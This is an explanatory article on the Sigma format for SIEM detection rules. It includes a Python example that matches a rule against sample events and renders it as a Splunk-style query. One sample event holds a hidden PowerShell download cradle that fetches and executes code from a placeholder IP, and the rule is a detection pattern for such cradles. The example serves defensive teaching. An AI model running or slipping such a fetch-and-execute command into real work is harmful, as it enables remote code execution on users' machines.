What is Sigma?
Sigma is a project that describes itself as a generic and open signature format for SIEM detection rules. The idea is to provide a structured form in which researchers and analysts can describe their detection methods and share them with others.
Trying to standardise the detection rules used by SIEMs may look like a purely technical exercise, but it is an important step towards collaboration between security teams.
A database of generic SIEM detection rules would let just about anyone furnish their SIEM with relevant rules, regardless of the technology they chose (or had imposed on them), whether that means analysts from the same large company at different sites sharing work, or an open resource for smaller companies that are starting to take cybersecurity seriously.
In addition, a Sigma rule is a description of the detection logic rather than a vendor-specific query: a log source, one or more named selections of field/value pairs, and a condition that combines them. That makes rules human readable and therefore reviewable. The Sigma project also provides a converter (originally sigmac, now sigma-cli built on pySigma) that takes Sigma rules as input and turns them into the native query languages of commonly used SIEMs (Elastic, Splunk...). The practical caveat is that the converted query is only as good as the field mapping: if your pipeline does not normalise logs to the field names the rule expects, the rule converts cleanly but never fires.
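To make the format concrete, here is an added example that is not code from the Sigma project: a minimal Python evaluator and converter for a Sigma-style rule. The rule and the three log events are constructed for illustration (field names follow Sysmon process-creation events; the rule itself is hypothetical), and `to_splunk` is a deliberately simplified stand-in for a real Sigma backend, not the output of sigmac or sigma-cli. It shows the three things the format relies on: selections match all their fields (AND) with list values as alternatives (OR), string comparison is case-insensitive with `|contains`/`|startswith`/`|endswith` modifiers, and the `condition` is a small boolean expression over selection names that both a matcher and a converter can walk.

```python
import re
from typing import Any

# Constructed Sigma-style rule written as a Python dict with the same keys a
# Sigma YAML file has (title, logsource, detection, condition, level).
# Field names follow Sysmon process_creation events; the rule is hypothetical.
RULE = {
    "title": "PowerShell download cradle (example rule)",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": "\\powershell.exe",
            "CommandLine|contains": ["DownloadString", "Invoke-WebRequest"],
        },
        "filter": {"CommandLine|contains": "chocolatey"},  # known-good exclusion
        "condition": "selection and not filter",
    },
    "level": "high",
}

# Constructed sample events standing in for normalised SIEM records.
EVENTS = [
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://198.51.100.7/a')"},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShell.EXE",
     "CommandLine": "powershell -c Invoke-WebRequest https://community.chocolatey.org/install.ps1"},
    {"Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd /c whoami"},
]


def _value_matches(modifier: str, value: str, actual: str) -> bool:
    """Sigma string comparison is case-insensitive; the modifier narrows it."""
    v, a = value.lower(), actual.lower()
    if modifier == "contains":
        return v in a
    if modifier == "startswith":
        return a.startswith(v)
    if modifier == "endswith":
        return a.endswith(v)
    return a == v  # no modifier: exact match


def selection_matches(selection: dict, event: dict) -> bool:
    """Every field in a selection must match (AND); a list of values is OR."""
    for key, values in selection.items():
        field, _, modifier = key.partition("|")
        actual = event.get(field)
        if actual is None:
            return False
        candidates: Any = values if isinstance(values, list) else [values]
        if not any(_value_matches(modifier, str(v), str(actual)) for v in candidates):
            return False
    return True


def parse_condition(text: str) -> tuple:
    """Parse 'a and not (b or c)' into nested tuples: ('and', ('id','a'), ...)."""
    tokens = re.findall(r"\(|\)|\w+", text)
    pos = 0

    def take() -> str:
        nonlocal pos
        pos += 1
        return tokens[pos - 1]

    def peek():
        return tokens[pos] if pos < len(tokens) else None

    def expr() -> tuple:                      # expr := term ('or' term)*
        node = term()
        while peek() == "or":
            take()
            node = ("or", node, term())
        return node

    def term() -> tuple:                      # term := factor ('and' factor)*
        node = factor()
        while peek() == "and":
            take()
            node = ("and", node, factor())
        return node

    def factor() -> tuple:                    # factor := 'not' factor | '(' expr ')' | name
        tok = take()
        if tok == "not":
            return ("not", factor())
        if tok == "(":
            node = expr()
            if take() != ")":
                raise ValueError("unbalanced parentheses in condition")
            return node
        return ("id", tok)

    tree = expr()
    if pos != len(tokens):
        raise ValueError(f"trailing tokens in condition: {tokens[pos:]}")
    return tree


def rule_matches(rule: dict, event: dict) -> bool:
    """Evaluate the rule's condition against one event."""
    det = rule["detection"]

    def walk(node: tuple) -> bool:
        kind = node[0]
        if kind == "id":
            return selection_matches(det[node[1]], event)
        if kind == "not":
            return not walk(node[1])
        left, right = walk(node[1]), walk(node[2])
        return (left and right) if kind == "and" else (left or right)

    return walk(parse_condition(det["condition"]))


def match_events(rule: dict, events: list) -> list:
    """Indices of the events the rule fires on."""
    return [i for i, ev in enumerate(events) if rule_matches(rule, ev)]


def to_splunk(rule: dict) -> str:
    """Render the same rule as a Splunk-style search (simplified backend)."""
    det = rule["detection"]

    def field_expr(key: str, values: Any) -> str:
        field, _, modifier = key.partition("|")
        candidates = values if isinstance(values, list) else [values]
        pre = "*" if modifier in ("contains", "endswith") else ""
        post = "*" if modifier in ("contains", "startswith") else ""
        # Backslashes are escape characters inside Splunk quoted strings.
        alts = [f'{field}="{pre}{str(v).replace(chr(92), chr(92) * 2)}{post}"' for v in candidates]
        return alts[0] if len(alts) == 1 else "(" + " OR ".join(alts) + ")"

    def walk(node: tuple) -> str:
        kind = node[0]
        if kind == "id":
            parts = [field_expr(k, v) for k, v in det[node[1]].items()]
            return parts[0] if len(parts) == 1 else "(" + " AND ".join(parts) + ")"
        if kind == "not":
            return "NOT " + walk(node[1])
        return f"({walk(node[1])} {kind.upper()} {walk(node[2])})"

    return walk(parse_condition(det["condition"]))


if __name__ == "__main__":
    print("matching events:", match_events(RULE, EVENTS))
    print("splunk:", to_splunk(RULE))
```

Only the first event fires: the second is the same cradle pattern but carries the `chocolatey` exclusion, and the third is not PowerShell at all. Note that the exclusion is matched against the raw command line, so a malicious command that merely mentions "chocolatey" would also be excluded; that is exactly the kind of weakness a reviewer can spot because the rule is readable, and exactly what a converter would faithfully carry into every SIEM.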